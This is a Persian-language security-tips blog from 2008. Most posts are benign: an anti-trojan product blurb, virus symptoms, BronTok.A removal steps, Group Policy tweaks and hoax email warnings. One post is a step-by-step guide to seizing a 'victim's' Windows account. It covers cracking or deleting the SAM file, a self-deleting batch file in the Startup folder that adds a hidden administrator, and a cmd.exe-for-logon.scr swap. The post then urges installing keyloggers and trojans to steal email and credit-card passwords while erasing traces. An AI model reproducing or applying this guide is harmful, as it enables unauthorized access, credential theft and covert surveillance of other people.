تبليغاتX

 

 درخواست نرم افزار درخواست ترفند درخواست ترفند موبایل اس ام اس های زیبا

AMIR

منبع: www.p30download.com



با گسترش ارتباطات اینترنتی و استفاده اکثر مردم از اینترنت، امنیت در برابر حملات و آسیب های ناشی از حمله ی ویروس ها، تروجان ها و ...اهمیت بسیاری پیدا کرده است و ممکن است هر لحظه اطلاعات مهم از قبیل فایل ها، عکس ها، پسوردها و دیگر اطلاعات حیاتی شما به سرقت برود. حتما سیستم شما هم تا کنون به یکی از چندین انواع تروجان ها و کرم ها و یا هر نوع بد افزار های دیگر آلوده شده است. این نوع فایل ها که اغلب به همراه دیگر فایل ها و به صورت مخفی وارد سیستم می شوند، همیشه باعث ایجاد یک ناهماهنگی و یا ایجاد یک آسیب بزرگ در سیستم می شوند. بهترین راه مقابله با این نوع آسب ها نیز جلوگیری از ورود این تروجان ها به درون سیستم می باشد چرا که اگر این نوع فایل ها وارد سیستم شوند حتی اگر موفق به سرکوب آنها بشوید ماحصل کار خرابی ها و زیان هایی می باشد که تروجان و یا کرم به سیستم شما وارد کرده است. ابزارهای بسیاری با نام " آنتی ویروس" برای مقابله با اینگونه حملات و آسیب ها به بازار عرضه شده اند.
Anti-Trojan Elite نرم افزاري قدرتمند براي پاکسازي تروجان ها که محصول شرکت  ISecSoft می باشد. تروجان نامی است كه با الهام از افسانه يونانى اسب تروا برگرفته شده است. این نرم افزار قدرتمند برای پاکسازی سیستم از تروجان ها طراحی شده است. به کمک این نرم افزار کاربران قادرند به راحتی تروجان های نصب شده احتمالی بر روی سیستم را شناسایی نموده و اقدام به پاکسازی آن ها نمایند. این نرم افزار با نظارت مداوم بر سیستم مانع از اجرای فایل های آلوده به تروجان بر روی سیستم می شود. همچنین این نرم افزار از ابزارهای مختلفی برای پاکسازی سیستم از برنامه های مورد استفاده هکرها برخوردار می باشد. روش كار اين نرم افزار بدين شكل است كه اين برنامه از دو قسمت Client و Server تشكيل شده است. بخش سرور در واقع يك فايل مى باشد كه به وسيله هكر، تنظيمات مختلفى در آن قرار داده مى شود و كافي است تا به هر روشى تنها يك بار فايل سرور بر روى سيستم قربانى اجرا شود تا كنترل كامل آن در دست هكر قرار گيرد. همچنین این نرم افزار قابلیت شناسایی بیش از 35 هزارنوع مختلف تروجان و برنامه های نفوذگر را دارا می باشد و به محض حضور یک تروجان در سیستم، این نرم افزار درجا جلو فعالیت آن را می گیرد.

قابلیت های کلیدی نرم افزارAnti-Trojan Elite 4.2.7:
- قابلیت بروز رسانی پایگاه داده برای شناسایی برنامه های مخرب جدید
- نظارت
Real-Time بر روی سیستم و کنترل پروسه های در حال اجرا در حافظه اصلی
-
اسکن نمودن و نظارت بر فایل های موجود بر روی هارد دیسک  و از بین برنده تروجان ها
- قابلیت کنترل محتویات فایل های فشرده RAR ،ZIP  CAB
- امکان تهیه پشتیبان از فایل، قبل از کشتن
تروجان
- دارای ابزار مدیریت بر پروسه ها به منظور کنترل پروسه های در حال اجرا توسط کاربر
- دارای ابزار رفع مشکلات برای برنامه
Internet Explorer و رجیستری ویندوز
-
مونیتورینگ سیستم
- مدیریت
شبکه و زیر نظر گرفتن حالات و فرآیندهای متعلق به tcp/udp
- پشتیبانی از ویندوز ME ،98 ، ،2000 ،XP ،2003 ،VISTA
- و ...


قیمت: 39.95 دلار آمریکا
پسورد:
www.p30download.com
دانلود - 7.15 مگابایت | لینک کمکی
سایت سازنده

+ نوشته شده توسط امیر در یکشنبه پانزدهم دی 1387 و ساعت 2:39 |

گاهی اوقات احساس می شود که برنامه های کامپیوتر درست اجرا نمی شود و یا سیستم بی دلیل دچار وقفه است . از بین دلایل مختلف این امر یکی وجود ویروس است که از نشانه های وجود آن در سیستم می توان به موارد زیر اشاره کرد :

 

-1 انجماد بی دلیل
-2 پر شدن بی دلیل RAM
-3 روشن ماندن هارد در زمان استفاده نشدن
-4 تغییر تاریخ فایل های اجرایی مهم و با پسوند COM و EXE
-5 حضور فایل های بیگانه
-6 از بین رفتن بخشهایی از برنامه های موجود در سیستم و گاهی کل آنها

 

طبقه بندی ویروسها

-1 خود ویروس که با پسوند های اجرایی و گاهاً حالت ضمیمه به غیر اجرایی ها به محض ورود مشغول انجام دستورات داده شده می گردد.
-2 کرم ها که با پر کردن رم و ایجاد حفره در سیستم ایجاد اختلال می کنند.
-3 اسب های تروا که معمولا در باکسهای برنامه به صورت نهفته وجود دارند و منتظر اجرا هستند و به همین علت به آنها اسب تروا میگویند.( حتما داستان جنگ اساطیری روم را شنیده اید که سربازان رومی با مخفی شدن در اسب تروا توانستند به داخل شهر یونانی ها وارد شوند و جنگ را به نفع خود تمام کنند.عملکرد این ویروس عیناً همانند همین اسب و سربازان است. بدین ترتیب که اسب باکس یا جعبه برنامه است و به جای سربازان ویروس مخفی شده است.)
-4 بمبها
4 -1بمب منطقی : این بمب به عملکرد خاصی حساس است . مانند استارت ویندوز یا اجرای یک برنامه
4-2 بمب زمانی : همانطور که از نامش پیداست در زمان خاصی عمل می کند. مانند چرنویل که در سالروز واقعه چرنویل روسیه عمل میکند.
4-3 بمب خوشه ای : این بمب در یونیکس استفاده می شود که لازم به توضیح نمیبینم عملکرد آنرا تفضیل کنم.

+ نوشته شده توسط امیر در جمعه سوم آبان 1387 و ساعت 5:20 |

خیلی اوقات پیش می آید که کامپیوتر شما دچار ویروسی می شود که امکان اسکن و تشخیص آن توسط آنتی ویروس وجود ندارد و یا آنکه ویروس با تشخیص نصب بودن آنتی ویروس بروی سیستمتان عملکرد آن را دچار اختلال می کند و مانع از این می شود که شما بتوانید از آنتی ویروس خود برای اسکن کامپیوتر استفاده کنید. در این شرایط چه باید کرد؟ آیا راهی وجود دارد که بتوان در این شرایط کامپیوتر را خودمان اسکن کنیم و مشکل به وجود آمده در آنتی ویروس را برطرف کرد؟ پاسخ تمامی این سوالات مثبت است! در این ترفند قصد داریم به معرفی روشی ابتکاری و در عین حال کاربردی بپردازیم که با استفاده از آن میتوانید کامپیوتر خود را شخصأ اسکن کنید و ویروس موجود را پاک کنید ، بدون بهره گیری از هیچ نوع آنتی ویروسی!

اولین قدم برای اسکن کردن کامپیوترتان نمایش فایل های مخفی در کامپیوتر می باشد.

برای انجام این کار : ابتدا با مراجعه به My Computer بروی منوی Tools کایک کنید و از منوی حاصل بروی عبارت Folder Options کلیک کنید. سپس بروی برگه View کلیک کنید و در این برگه تیک کنار عبارت های Show Hidden Files and Folders را فعال کنید و تیک کنار عبارت Hide Extensions For Known File Types را بردارید و بروی عبارت OK کلیک نمایید.
اینک از طریق مسیر C:/Windows/system32 به پوشه System32 مراجعه کنید. پس از ورود به پوشه system32 بروی منوی View کلیک کنید و از منوی حاصل عبارت Details را انتخاب کنید.
حال در پوشه system32 بروی جدا کننده Date Modified کلیک کنید و آنرا به سمت راست بکشید به طوری که تاریخ تمامی فایل ها یه طور کامل نمایش داده شود.
فایل های نمایش داده شده در پوشه system32 فایل های سیستمی مربوط به ویندوز می باشد که اکثرا با پسوند dll می باشد و این بخش معمولا مورد هدف ویروس ها و Spyware قرار می گیرد و خود را در بین این فایل ها مخفی می کنند.

اگر دقت کنید متوجه خواهید شد که اکثر این فایلهای قرار گرفته در این بخش دارای یک زمان مشخص می باشد و این زمانها (مثلا 8/10/2004) معرف این می باشد که مایکروسافت در این تاریج برنامه مربوط به فایل مورد نظر را به پایان رسانیده است (ترفندستان) و در واقع این زمان ها هیچ ربطی به زمان نصب ویندوز ندارد. حال اگر ویروس و یا spyware به این بخش حمله کند زمان آن با زمان فایل های سیستمی موجود در پوشه system32 مطابق ندارد و زمانی جدید تر از زمان مربوط به فایلهای سیستمی ویندوز خواهد بود و به راحتی از طریق مشاهده زمان های قرار گرفته در Date Modified قابل تشخیص می باشد. البته نکته بسیار مهم که باید توجه شود این است که نصب یک سخت افزار جدید و یا یک نرم افزار خاص می تواند فایلی را در این بخش کپی کند که زمان آن با زمان فایل های سیستم مطابق ندارد.

پس برای اینکه فایلی را در این بخش به اشتباه پاک نکنید روشی را مطرح میکنیم که این اشتباه رخ ندهد:
اگر میان فایل های واقع در پوشه system32 به فایلی برخورد کردیدکه تاریخ آن با تاریخ فایل های سیستمی ویندوز مطابقت نداردبروی این فایل کلیک راست کنید و گزینه Properties را انتخاب نمایید. سپس در پنجره Properties بروی برگه Version کلیک کنید و در این برگه نام کمپانی و ورژن فایل مورد نظر را مطالعه کنید.
اگر اطلاعات این فایل شامل نام کمپانی و خیلی اطلاعات دیگر برایتان آشنا نبود نام فایل مورد نظر را در موتور جستجو گر گوگل تایپ کنید و اگر در نتایج جستجو به این اشاره شده بود که این فایل ویروس است حتما آن را پاک کنید ولی اگر در نتایج جستجو به آلوده بودن این فایل اشاره نشده بود این فایل به واسطه یک سخت افزار و یا نرم افزاری به وجود آمده است.

+ نوشته شده توسط امیر در جمعه سوم آبان 1387 و ساعت 5:15 |
درويندوز 2000 و XP برنامه ای هست بنام Group Policy که ازطریق آن میتوان دسترسی به سيستم را به روشهای گوناگون محدود کرد از جمله Control Panel یکی از آنهاست که میتوان کارهای زیر را در مورد آن انجام داد :
الف - دسترسی محدود به Control Panel و یا از کار انداختن اجزای آن به طور کامل.

ب -  نمایش دادن گزينه های خاصی در Control Panel .
پ -  پنهان کردن گزينه های خاصی از ديد کاربر. 
 برای پنهان کردن کنترل پنل مراحل زير را انجام دهید :
1- از منوی Start گزينه Run را انتخاب کنيد و بنویسید gpedit.msc و سپسOK کنيد.
2- در قسمت User Configuration به Administrative Templates برويد روی آن کلیک کنید (یا در قسمت زیرش  Control Panel را کلیک کنید) تا گزينه های آن در پنل سمت راست نمایان شوند و بعد روی Control Panel کلیک کنيد.
3- اگرويندوز شما 2000 است بر روی Disable Control Panel و اگر xp است بر روی Prohibit access to the Control Panel دوبار کليک کنيد.
4- گزينه Enable را انتخاب کنيد و OK را بزنيد 
از این ببعد هيچکس قادر به دسترسی به Control Panel نيست حتی خود شما Administrator .
نکته : برای برگرداندن کنترل پنل مراحل بالا را دو باره انجام دهید و ایندفعه Not Configured را تیک بزنید.

درسيستم Workgroup محدوديت به تمام کاربرهای سيستم اعمال ميشود حتی Administrator و برای رهايی از اين مشکل بايد از يک سيستم مبتنی بر Domain استفاده کرد تا بتوان با استفاده از OU ها تغييرات را به کاربرها و گروههای خاص اعمال کرد. 
گزينه های مورد نظر برای نمايش یا عدم نمايش:
اگر میخواهید یک گزينه يا چندین گزینه را مخفی کنید و بقیه گزينه ها نمايش داده شوند :
1- مرحلهای شماره 1 و 2 بالا را دو باره انجام دهید.
2- بر روی Hide Specified Control Panel Applets کليک کنيد و Enable را انتخاب کنيد.
3-بر روی Show کليک کنيد و در صفجه بعد دکمه Add را بزنيد.
4- در پنجره جديد نام کنترل مورد نظررا بنويسيد. نامی که وارد ميکنيد بايد عيناً نام در Control Panel باشد.

مثال : میخواهید کنترلPower Options را از ديد خارج کنيد باید بنويسيد Power Options و پنجره ها را OK کنيد.
از این ببعد هنگام مراجعه به Control Panel ديگر Power Options را نمي بينيد.

توضیح اینکه: فقط گزینه دیده نمیشود و کسی که وارد به جزییات است ميتواند با نوشتن sysdm.cpl در کادر فرمان آن را نمایان کند.

نکته : برای برگرداندن گزينه ها مراحل بالا را یک بار دیگر انجام دهید و گزینه هایی را که انتخاب کرده اید را پاک کنید و ایندفعه Not Configured را تیک بزنید.

+ نوشته شده توسط امیر در جمعه سوم آبان 1387 و ساعت 5:11 |
شیوه ی پاک کردن ویروس BronTok.A :

در زیر به برخی از ویژگی های این ویروس اشاره می کنیم :

1 .
Folder Options را حذف می کند !
2 .
Registry Tools را قفل می کند !
3 .
Task Manager نمی تواند فایل های مربوط به این ویروس را End کند !
4 . پس از اجرا شدن ، محتویات
My Documents را نمایش می دهد !
5 . اگر در کادر محاوره ای
Run عبارت CMD ، Regedit ، msconfig ، Regedt32 را تایپ کنید ، سیستم بلافاصله Restart می شود !
6 . اگر روی گزینه ی
Log Off یا Turn Off Computer کلیک کنید ، سیستم Restart می شود !
7 . آیکون این ویروس شبیه آیکون یه پوشه است !

همانطور که می دانید فایل های
lsass.exe ، winlogon.exe و services.exe از فایل های سیستمی بوده و همیشه در حال اجرا هستند ...
اگر شما برنامه ی
Process Master را اجرا کنید ، می بینید که این فایل ها در پوشه ی System32 قرار دارند .
اما اگر ویروس
BronTok.A روی سیستم شما نصب باشد ، خواهید دید که سه تا فایل دیگر با همین نام ها در حال اجرا هستند !!
یعنی دو تا
winlogon.exe ، دو تا lsass.exe و دو تا services.exe !
اما به راحتی میشود فهمید که کدام ویروسند و کدام فایل اصلی ویندوز ...
آن سه تا فایلی که مربوط به ویروس میشوند ، در پوشه ای غیر از
System32 قرار دارند .

مسیر دقیقشان میشود :

C:\Documents and Settings\User\Local Settings\Application Data

C نام همان درایویست که ویندوز در آن نصب گردیده و User نام کاربری است که ویروس در آن اجرا شده ...

بعد از اینکه با نرم افزار
Process Master متوجه شدید که کدام ویروسند ، باید آن ها رو Kill process کنید .

اگر احیانا فایل های دیگری با نام های
inetinfo.exe ، csrss.exe و smss.exe نیز در حال اجرا بودند آنها را هم Kill process کنید .البته به شرطی که مسیرشان غیر از

System32 باشد ...

حالا وقت آن است که از نرم افزار
Kill BronTok.A استفاده کنید .

پس از اینکه نرم افزار
Kill BronTok.A کارش تمام شد ، آن را ببندید و به منوی Start برید و روی گزینه ی Search کلیک کنید .

در سمت چپ روی گزینه ی
All files and folders کلیک کنید .

در فیلد
All or part of the file name عبارت Empty.pif را تایپ کنید و از روی کیبرد کلید Enter را فشار دهید .اکنون تمام فایل های پیدا شده را پاک کنید .

دوباره در فیلد مذکور عبارت زیر را تایپ کنید و از روی کیبرد کلید
Enter را فشار دهید .

scr،*.exe.*

اکنون از بین فایل های پیدا شده ، هر فایلی که آیکونش شبیه آیکون پوشه بود رو پاک کنید .

مجددا در فیلد
All or part of the file name عبارت زیر را تایپ کنید و از روی کیبرد کلید Enter را فشار دهید .

job.*

تمام فایل های پیدا شده را پاک کنید .
باز هم در فیلد فوق الذکر عبارت
Bron را تایپ کنید و از روی کیبرد کلید Enter را فشار دهید .

اکنون تمام فایل ها و پوشه های پیدا شده را پاک کنید .

اکنون با خیال راحت کامپیوترتان را
Restart کنید .

نکته :

اگر ویندوزتان بیشتر از یک کاربر دارد ، باید تمام عملیات فوق را در همه ی کاربرها انجام دهید
+ نوشته شده توسط امیر در جمعه سوم آبان 1387 و ساعت 5:5 |

روش شناسایی ویروس


ادامه مطلب
+ نوشته شده توسط امیر در جمعه سوم آبان 1387 و ساعت 5:1 |
» روش اول :

در جایی که از شما
UserName , Password
پرسیده می شود کلید های Alt+Ctrl+Del را دو مرتبه همزمان فشار دهید . در قسمت UserName کلمه Administrator را وارد کرده و جای کلمه عبور را خالی بگذارید و Enter بزنید تا وارد ویندوز شوید ...
خوب این روش ساده بود اما همیشه کارساز نیست اگر برای
Administrator آن کلمه عبوری قرار داده شده باشد ؟!!

به سراغ روش دوم میرویم :
» روش دوم :
1- ابتدا یک فلاپی
Bootable می سازیم .
2- اغلب فایل سیستم ویندوز
XP,2000 از نوع NTFS است و در محیط شبیه Dos که با فلاپی راه اندازی میشود شناخته نمی شود بنا براین ما برای این کار نیاز به برنامه هایی مثل NTFS4DOS ( دانلود : http://users.cjb.net/mojtaba/ntfs4dos.zip ) داریم.(این نوع برنامه ها امکان کار کردن با درایو هایی که فایل سیستم آنها Ntfs را در dos به ما می دهد.)

3- حالا که فلاپی آماده شد باید با آن سیستم را راه اندازی کرد... اما اگر در
Setup سیستم تنظیم شده باشد که با فلاپی راه اندازی نشود ...؟!! آنگاه باید به سراغ Setup رفت و در آن تنظیمات لازم را انجام دهیم اگر Setup با کلمه عبور محافظت شود آنگاه باید به Bios ( مقاله نفوذ به بایوس : لینک مقاله بایوس ) نفوذ کنیم.

4- خوب پس از انجام مراحل فوق فلاپی را در فلاپی درایو قرار داده و سیستم را با آن راه اندازی می کنیم . و بر نامه
NTFS4DOS را اجرا می کنیم تا به اطلاعات درایو های NTFS دسترسی داشته باشیم .

5- درایوی که ویندوز در آن نصب است را پیدا می کنیم و به مسیر زیر رفته :

%
Windir%\System32\Config\
Example : c:\windows\system32\config

در این پوشه فایلی به نام *
sam را در فلاپی کپی می کنیم.

( نکته : در ویندوز 2000 با پاک کردن این فایل دیگر کار تمام است و میتوان با
Username: Administrator و بدون پسورد وارد شویم اما میتوان برای این که رد پایی باقی نماند از فایل Sam یک کپی داشته باشیم تا بعد از انجام کارمان در ویندوز با برگرداندن این فایل به جای قبلی آن رد پای خود را پاک کنیم و نام و پسورد کاربران به حالت قبل برگردد.)
از این مرحله به بعد برای
Windows Xp بیشتر توصیه میشود :
6- بعد از کپی فایل با برنامه هایی نظیر
L0phtCrack ,John the Ripper آن را کرک می کنیم تا پسورد را به دست آورد .

» روش سوم :
در این روش چهار مرحله اول روش دوم را انجام میدهیم.
1- دستورات زیر را در
Notepad می نویسیم و در فایلی با نام و پسوند test.bat ذخیره میکنیم :
echo off@

net user administrator 123 /add

net localgroup administrator administrators /add

net user administrator 123

del test.bat

echo on@


2- بعد فایل مورد نظر را در فلاپی کپی کرده و به سراغ کامپیوتر قربانی می رویم و فایلی که در مرحله قبل ساخته ایم را در مسیر زیر کپی می کنیم(به فرض که ویندوز در درایو
C نصب باشد و کاربری با نام MOJTABA مدیر سیستم باشد):
C:\Documents and Settings\MOJTABA\Start Menu\Programs\Startup
3- خوب حالا فقط کافی است که منتظر بمانید تا کاربر
MOJTABA یک بار وارد شود دیگر تمام است و شما بعد از آن می توانید با نام کاربری Administrator و کلمه عبور 123 وارد سیستم شوید.
توضیح دستورات مربوط به فایلی که میسازیم :
در خط اول این دستور باعث مخفی شدن بقیه دستورات در حال اجرا از دید کاربر می شود.
در خط دوم ما یک کاربر بانام
Administrator و کلمه عبور 123 می سازیم .(این عمل برای این صورت می گیرد که ممکن است نام Administrator را تغییر داده باشند).
در خط سوم کاربری را که در خط قبل ساخته ایم را به عنوان سرپرست (ادمین) سیستم قرار میدهیم.
در خط چهارم احتمال می دهیم که نام
Administrator را تغییر داده نشده باشد . پس ما فقط پسورد آن را عوض می کنیم.
در خط پنجم برای از بین بردن رد پا فایلی را که ساخته ایم را پاک می کنیم.
در خط ششم هم حالتی را که دستور خط اول ایجاد کرده بود به حالت اول بر می گردانیم.
نکته : توجه کنید که به جای کاربر
Administrator و کلمه عبور 123 هر کاربر یا کلمه عبور دیگری می توانید قرار دهید اما این کاربر کمتر باعث شک می شود .

روش چهارم :

استفاده از برنامه
Windows XP / 2000 / NT Key است . نسخه آزمایشی این برنامه را می توانید از اینجا دریافت کنید.
» روش پنجم ( البته این روش را من پیدا نکردم اما اشکالات آن را رفع کرده ام)
تا مرحله 4 را انجام می دهیم حالا در
Dos هستیم و دستورات را جلوی خط فرمان می نویسیم .
الف - ابتدا به درایوی می رویم که در آن ویندوز نصب شده است .برای مثال فرض کنیم در درایو
C نصب باشد دستور زیر را اجرا می کنیم :
:
c

ب -
Windows/System32 میرویم .و در آنجا کارهای زیر را انجام می دهیم :
با دستور :
cd windows/system32
پ - یک پوشه ایجاد می کنیم با دستور زیر :
md hack
ت - حالا دو فایل
cmd.exe و logon.scr را به این پوشه کپی می کنیم تا یک نسخه پشتیبان از این فایل ها داشته باشیم با اجرای دستورات زیر :
copy cmd.exe hack
copy logon.scr hack
ث - حالا فایل
logon.scr را پاک می کنیم :
del logon.scr
ج - حالا فایل
cmd.exe را به logon.scr تغییر نام می دهیم :
ren cmd.exe logon.scr
حالا کافی است کامپیوتر را ریستارت کنید .
بعد از این که ویندوز بالا آمد ، اگر توجه کنید چند دقیقه که صبر کنید در حالت عادی
Screen saver Logon.scr به اجرا در می آید اما با این دستکاری که ما کرده ایم Cmd.exe به اجرا در می آید حالا می توانید کاربر جدید ایجاد کنید و یا کلمه عبور را عوض کنید .
برای ایجاد حساب کاربری از دستور زیر استفاده می کنیم :

net user Mojtaba 123 /add
این دستور یک حساب کاربری با نام
Mojtaba و کلمه عبور 123 ایجاد می کند.
برای این که این کاربر را مدیر(
Administrator) قرار دهیم دستور زیر را انجام می دهیم :
net localgroup Mojtaba administrators /add
حالا اگر یک حساب کاربری موجود باشد و بخواهیم پسورد اون رو عوض کنیم دستور زیر را انجام می دهیم :
net user Ali 123

این دستور بدون این که پسورد قبلی کاربر
Ali را از ما بخواهد پسورد اون رو به 123 تغییر می دهد.
ضمنا بعد از ورود به سیستم فایل هایی که در پوشه
hack کپی کرده ایم را به جای قبلی برگردانید و پوشه hack را پاک کنید تا ردی باقی نماند .
--------------------------------------------------------------------------------------------نتیجه :
حالا که به عنوان مدیر وارد سیستم شدیم چه کارهایی می توانیم انجام دهیم .
اول این که می توانید به اطلاعات سیستم دسترسی پیدا کرده و ...
دوم این که توصیه می شود یک برنامه جاسوسی مثل
XpSpy ها ویا Key Logger ها نصب کنید تا تمامی پسورد های ایمیل ها و کارتهای اعتباری و ... و وب سایت های که سر می زند و حتی کلماتی که چت می کند و ... را بدانید ( در آینده نه چندان دور مقاله ای در مورد برنامه های جاسوسی خواهم نوشت ).
سوم این که میتوانید یک تروجان روی کامپیوتر قربانی نصب کنید و بقیه اش رو خودتون میدونین ...
چهارم این که می توانید کامپیوتر او را طوری پیکر بندی کنید که به شما اجازه ریموت کردن را بدهد و با یک تروجان آی پی اون رو به دست آورید و اون را کنترل کنید .

پنجم ...
توصیه های مهم :
1- از دسترسی افراد نامطمئن به سیستم خود جلوگیری کنید .
2- حداقل کاری که میتونین انجام بدین این است که سیستم شما با
CDو یا Floppy بوت نشود و Bios خود را با کلمه رمز محافظت نمایید.
3- همیشه از کلمات عبور پیچیده که مخلوتی از حرف و عدد و علائم ویژه باشد استفاده کنید . مثلا کلمه عبور
X@#%Übps خیلی بهتر از کلمه عبور spssstudioworks است . این کار حداقل کرک کردن پسورد شما را طولانی میکند.
4-
LM Hash را غیر فعال کنید . برای این منظور به کنترل پانل رفته و Local Security Policy را از Administrative Tools را اجرا کرده و به پوشه Security Option از پوشه Local Policies رفته و در آنجا Network Security : Do not Store LAN Manager hash value on next password change را Enable کنید سپس پسورد ادمین را عوض کنید.

5- نام کاربری
Administrator وGuest را حتما تغییر دهید و برای آنها کلمه عبور قرار دهید .
6- اگر به کاربر
Guest نیازی ندارید آن را غیر فعال کنید .
7- هر چند وقت یکبار پسورد خود را عوض کنید.
8- کاربران خود را هر چند وقت یکبار چک کنید تا از موارد مشکوک مطلع شوید
+ نوشته شده توسط امیر در جمعه سوم آبان 1387 و ساعت 4:56 |

۱۰ ترفند برای جلوگيری از کند شدن سيستم شما!


ادامه مطلب
+ نوشته شده توسط امیر در جمعه سوم آبان 1387 و ساعت 4:54 |
 

یکی از ساده ترین روشهای هکرها و ویروس نویسان ، استفاده از پست الکترونیکی یا ایمیل برای به خطر انداختن امنیت کاربران است. این روش هر اندازه که ساده صورت میگیرد به همان سادگی نیز قابل تشخیص است. چرا که تنها با متون خاص شما را ترقیب به دریافت فایل الصاقی یا کلیک روی یک لینک میکنند. در این ترفند قصد داریم دست این افراد را برای شما رو کنیم تا دیگر به ساده ترین شکل دچار مشکلات امنیتی نشوید.

يك مشكل بسيار گسترده در اينترنت وجود دارد و آن پيغامهاي الكترونيكي كه در مورد يك ويروس هشدار مي دهند و اين هشدار در مورد يك email با يك عنوان ( subject ) مشخص مي باشد كه اين email ها ويروس هاي خطرناك هستند و به كامپيوتر شما آسيب مي رسانند.

مثال:

Please do not open up any mail that has this title.
It will erase your whole hard drive. This is a new
e-mail virus and not a lot of people know about
it, just let everyone know, so they won't be a victim.
Please forward this e-mail to you friends!!!
Remember the title: JOIN THE CREW.

مثال ديگر:

Subject: VIRUS WARNING VERY IMPORTANT
Please read the following message we received from a client.
If you receive an email titled "It Takes Guts to Say 'Jesus'"
DO NOT open it. It will erase everything on your hard drive. So, you must delete it.
Forward this E-MAIL out to as many people as you can. This is a new, very
malicious virus and not many people know about it. This information was
announced yesterday morning from IBM; please share it with everyone
that might access the internet. Once again, pass this along to EVERYONE in
your address book so that this may be stopped. AOL has said that this is
a very dangerous virus and that there is NO remedy for it at this time.
Please practice cautionary measures.

اگر شما email اي مانند اين ديديد آن را براي كسي نفرستيد! ويروسهاي "Jion The Crew" و "It Takes Guts to Say 'Jesus'" شوخي هستند! ويروسهاي شوخي ديگري وجود دارند مانند:

"Win a Hliday" , "AOL4Free" , "Pen Pal Greetings", "ghost" , "Deeyenda"

و بد نام ترين آنها "Good times" است.

ويژگيهاي اخطار ويروسهاي شوخي:

  • تأكيد بسيار
  • يك هشدار كه ويروس فقط با باز كردن پيغام فعال مي شود ( شما نمي توانيد فقط با باز كردن يك پيفام آلوده شويد مگر اينكه يك پيوست ( attachment ) را باز كنيد.
  • كلمات « اين يك ويروس جديد است كه بسياري از مردم آن را نمي شناسند » در آن ديده مي شود
  • دستور العملها به شما مي گويند كه با دنبال كردن يك لينك آن را برايكسانيكه مي شناسيد بفرستيد. 
  • با اشاره به اينكه ويروس روز قبل بوسيله يك شركت يا گروه كامپيوتري معتبر مانند "IBM" يا "Microsoft' و يا ... اعلام شده است مي خواهند هشدار خود موجه جلوه دهند.

در اينجا يك مثال از يك هشدار حقيقي در مورد ويروس وجود دارد:

Hi all,
There is a virus (a "worm", actually) currently doing the rounds that
comes packaged in a file called PrettyPark.exe attached to an email.
Apparently it has been around since May last year, but has proliferated
recently and is currently by far the most "popular" subject of enquiries
at Symantec's anti-virus research center.
The usual rules apply: don't open it.
Information (including a fix if you are infected) is available at this
site:
http://www.symantec.com/avcenter/venc/data/prettypark.worm.html
Good luck, Take care.

ويژگيهايي كه نشان مي دهند اين ويروس مربوط به يك ويروس واقعي است عبارتند از :

  • پيغام به شكل ساده و زبان منطقي و مستدل بيان شده است ( بدون هيچگونه بزرگنمايي در لغات )
  • پيغام در مورد باز كردن يك بايل الصاقي ( attachment ) هشدار ني دهد
  • پيغام آدرس سايت معتبري را مي دهد كه در آن مي توانيد در مورد ويروس اطلاعات بيشتري پيدا كنيد.
  • در پيغام اطلاعاتي در مورد اينكه اگر كامپيوتر شما آلوده به ويروس شد چه كار بايد انجام دهيد به شما اطلاعاتي ميدهد. 
  • در پيغام از شما خواسته نمي شود كه آن را براي كسي بفرستيد.
+ نوشته شده توسط امیر در جمعه سوم آبان 1387 و ساعت 4:51 |
یکی از مسائل مهمی که همواره کاربران چه در سیستم های شخصی و چه در داخل شبکه ها با آن روبرو هستند بحث امنیت است. بسیاری از کاربران امنیت سیستم خود را به دست آنتی ویروس ها می سپارند. اما آنتی ویروس ها معمولأ حجم زیادی از CPU را اشغال میکنند و معمولأ برنامه های سنگینی هستند. ابزارهای کوچک و ناشناخته ای نیز وجود دارند که در عین حال بسیار کارآمد هستند. در این ترفند قصد داریم به معرفی تعداد زیادی از این برنامه های امنیتی که امنیت سیستم شما را در برابر هکرها تضمین میکند بپردازیم. لینک دانلود این برنامه های سبک نیز موجود میباشند.

ادامه مطلب
+ نوشته شده توسط امیر در چهارشنبه یکم آبان 1387 و ساعت 3:32 |
كرمها اصولاً ويروس نيستند با اين وجود تفاوت بين آنها بسيار اندك است و معمولاً در اخبار روزمره آنها را با يكديگر اشتباه مي گيرند. ويروسها يك كامپيوتر منفرد را آلوده مي كنند و سعي نمي كنند به كامپيوتر ديگري راه پيدا كنند اما کرمها بسیار شرور ترند چرا که سعی میکنند به کامپیوترهای دیگر انتقال پیدا کنند. ( مثلاً با اشتراك گذاشتن فايلها بوسيله email يا بوسيله فلاپي ديسك ها). كرمها به شدت علاقه مندند كه فقط خود را در ميان يك شبكه گسترش دهند. آنها به طور خود كار خودشان را به كامپيوترهاي ديگر انتقال مي دهند به علت اينكه انتقال آنها بين كامپيوترها به طور خودكار انجام مي پذيرد سرعت گسترش آنها بسيار سريعتر از ويروسها است. اما همیشه ما زرنگ تر بوده ایم. در این ترفند قصد داریم راه هایی را به شما معرفی کنیم که میتوانید از ورود کرم ها به سیستم تان جلوگیری کنید.


ادامه مطلب
+ نوشته شده توسط امیر در چهارشنبه یکم آبان 1387 و ساعت 3:29 |
ویندوز XP نیز برای راحتی حال کاربران خود یک سیستم مقابله با ویروس ها و هکرها را در درون خود گنجانده است. این ترفند که بیشتر به کار افراد نیمه مبتدی می آید میتواند با استفاده از این قابلیت از ویندوز شما حفاظت کند.

برای فعال سازی آن:


ادامه مطلب
+ نوشته شده توسط امیر در چهارشنبه یکم آبان 1387 و ساعت 3:28 |
ممکن است شما نیز تا به حال در جستجوی کرک برنامه ها و بازی ها بوده اید ، اما متاسفانه سایتهای بسیاری وجود دارد که از این حربه برای فریب کاربران استفاده میکنند و برنامه های آلوده به ویروس خود را به جای کرک های برنامه ها به مردم تحویل میدهند. در این ترفند قصد داریم روشهای مفیدی را معرفی کنیم که میتوانید این کرکهای آلوده را که حتی بسیاری از آنتی ویروس ها در تشخیص آنها ناکام هستند ، خودتان تشخیص دهید.

برای استفاده از کرک این سایتها باید به موارد زیر توجه کرد:


ادامه مطلب
+ نوشته شده توسط امیر در چهارشنبه یکم آبان 1387 و ساعت 3:23 |
